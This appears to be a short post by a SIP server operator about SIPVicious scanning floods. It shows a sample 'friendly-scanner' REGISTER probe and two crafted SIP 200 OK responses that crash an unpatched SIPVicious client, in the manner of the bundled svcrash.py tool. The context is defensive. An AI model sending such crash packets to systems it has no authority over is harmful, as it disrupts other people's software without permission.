Occasionally we find one of our SIP servers being probed/attacked by some joker running sipvicious. If you're on your machine and see a flood of packets that look like this:
REGISTER sip:email@example.com SIP/2.0 Via: SIP/2.0/UDP 188.8.131.52:5337;branch=z9hG4bK-290698590;rport Content-Length: 0 From: "5233"<sip:firstname.lastname@example.org>; tag=353233330132343732353834313430 Accept: application/sdp User-Agent: <span class="highlight">friendly-scanner</span> To: "5233"<sip:email@example.com> Contact: sip:firstname.lastname@example.org CSeq: 1 REGISTER Call-ID: 1477783886 Max-Forwards: 70
then you're getting attacked too. There are some other flavors of sipvicious floating around out there as well that identify themselves in various ways, but "friendly-scanner" is the default.
The most recent releases of sipvicious, since about mid 2010, has included with it a tool called
svcrash.py. The tool allows you to crash a remotely running sipvicious client by sending a specially crafted SIP response, that is assuming the remote client is unpatched and up to date. The mechanism it uses is EXTREMELY simplistic, so that it could be patched by anybody with any coding talent in a matter of minutes, but not so simplistic as to be found with grep. The author certainly acknowledges the weakness of svcrash as well, but he provides it as a courtesy to stop the script kiddies. Anyway, here's the special response packet that will crash one of these friendly scanners:
SIP/2.0 200 OK Via: SIP/2.0/UDP 184.108.40.206:5061;branch=z9hG4bK-573841574;rport Content-length: 0 From: "100"<sip:100@localhost>; tag=683a653a7901746865726501627965 User-agent: Telkom Box 2.4 To: "100"<sip:100@localhost> Cseq: 1 REGISTER Call-id: 469585712 Max-forwards: 70
Now it's not actually completely obvious what will cause the crash by looking at this packet, but here is a hint, this packet would crash it too:
SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.0.1:5060;received=220.127.116.11;rport=5060;branch=z9hG4bK214549178 From: <sip:email@example.com>;tag=796f7501676f74016974 To: <sip:firstname.lastname@example.org>;tag=75d09fb22ceadb40012c6e771a69dc74.0d5d Call-ID: 1973675384 CSeq: 214 REGISTER Contact: <sip:email@example.com>;expires=239;received="sip:18.104.22.168:5060" Server: OpenSIPS Content-Length: 0
Let's see if you can figure out what the trick is.